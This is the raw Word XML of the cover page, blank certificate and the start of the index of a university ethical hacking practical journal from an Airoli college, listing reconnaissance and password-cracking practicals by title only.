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C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C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A27F352" wp14:editId="79AE7869">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1956435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-659765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4386580" cy="2326640"/>
                <wp:effectExtent l="13335" t="6985" r="1016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6580" cy="232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8C1" w:rsidRPr="00CD3CF0" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
                          <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878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37554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JNAN VIKAS MANDAL’S</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878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878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878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6BEC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>PADMASHREE DR. R.T.DOSHI DEGREE COLLEGE OF INFORMATION TECHNOLOGY</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878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6BEC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>MOHANLAL RAICHAND MEHTA COLLEGE OF    COMMERCE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878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6BEC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>DIWALIMAA DEGREE COLLEGE OF SCIENCE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878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6BEC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>AMRATLAL RAICHAND MEHTA COLLEGE OF ARTS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878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6BEC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>JVM’S DEGREE COLLEGE OF INFORMATION TECHNOLOGY</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878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6BEC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>AIROLI, NAVI MUMBAI – 400708</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00270986" w:rsidRDefault="00270986" w:rsidP="004878C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NAAC Reaccredited Grade ‘A+’ (CGPA- 3.31, 3</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00270986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</w:rPr>
                              <w:t xml:space="preserve"> Cyc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27F352" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:154.05pt;margin-top:-51.95pt;width:345.4pt;height:183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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="004878C1" w:rsidRPr="00CD3CF0" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
                    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C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37554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JNAN VIKAS MANDAL’S</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C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:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D26BEC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>PADMASHREE DR. R.T.DOSHI DEGREE COLLEGE OF INFORMATION TECHNOLOGY</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D26BEC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>MOHANLAL RAICHAND MEHTA COLLEGE OF    COMMERCE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D26BEC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>DIWALIMAA DEGREE COLLEGE OF SCIENCE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D26BEC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>AMRATLAL RAICHAND MEHTA COLLEGE OF ARTS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D26BEC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>JVM’S DEGREE COLLEGE OF INFORMATION TECHNOLOGY</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D26BEC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>AIROLI, NAVI MUMBAI – 400708</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00270986" w:rsidRDefault="00270986" w:rsidP="004878C1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NAAC Reaccredited Grade ‘A+’ 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(CGPA- 3.31, </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00270986">
                        <w:rPr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</w:rPr>
                        <w:t xml:space="preserve"> Cycle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54E5C5D" wp14:editId="1A3A3E52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-243205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-266065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2025650" cy="1701165"/>
                <wp:effectExtent l="13970" t="10160" r="8255" b="1270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17011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78C1" w:rsidRDefault="00270986" w:rsidP="004878C1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D3D3AB2" wp14:editId="4101A311">
                                  <wp:extent cx="1238250" cy="8572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7" type="#_x0000_t120" style="position:absolute;margin-left:-19.15pt;margin-top:-20.95pt;width:159.5pt;height:133.95pt;z-index:25204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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="004878C1" w:rsidRDefault="00270986" w:rsidP="004878C1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4D3D3AB2" wp14:editId="4101A311">
                            <wp:extent cx="1238250" cy="8572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25C43CD8" wp14:editId="745F00EF">
            <wp:extent cx="1655180" cy="1284790"/>
            <wp:effectExtent l="19050" t="0" r="2170" b="0"/>
            <wp:docPr id="19" name="Picture 1" descr="D:\Project\jv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jvm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42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C1" w:rsidRPr="00B80B24" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRPr="00B80B24" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>CERTIFICATE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">        This is to certify that the Mr./Miss.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> _______________________________      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">of  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T.Y.B.Sc.CS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Semester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26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6BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">has completed the practical work in the subject of  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ETHICAL HACKING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> during  the Academic year 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00200209">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r w:rsidR="0020020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26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">under the guidance  of  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dr</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26B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njiva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lkar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">being the partial requirement for the  fulfillment of the curriculum  of  Degree of Bachelor of  Science in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Computer Science</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26B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26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>University of Mumbai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Place:                                                                                              Date:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C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-----------------------------------------                           --------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6252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26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sign </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>of  Subject</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D26BEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Charge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        Sign of External Examiner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6252"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6252"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6252"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6252"/>
        </w:tabs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                           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D26BEC" w:rsidRDefault="004878C1" w:rsidP="004878C1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6252"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sign </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">of  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Incharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> / H.O.D                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1" w:rsidP="004878C1"/>
    <w:p w:rsidR="004878C1" w:rsidRDefault="004878C1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004878C1" w:rsidRPr="00D4195F" w:rsidRDefault="004878C1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00F1255A">
      <w:pPr>
        <w:spacing w:before="61"/>
        <w:ind w:left="1815" w:right="2712"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>INDEX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00F1255A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00F1255A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr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3735"/>
        <w:gridCol w:w="2376"/>
        <w:gridCol w:w="2376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="369"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="349" w:lineRule="exact"/>
              <w:ind w:left="86" w:right="82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Sr.No</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3735" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="349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Name o</w:t>
            </w:r>
            <w:r w:rsidR="00F1255A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F1255A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>Practicals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="349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2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="349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Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1024"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="1355"/>
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/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 xml:space="preserve">Google and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00404938">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>06</w:t>
            </w:r>
            <w:r w:rsidR="00F1255A" w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>/0</w:t>
            </w:r>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1027"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="467"/>
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/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 xml:space="preserve">Password Encryption and Cracking with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>CrypTool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> and Cain and Abe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>13/01/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
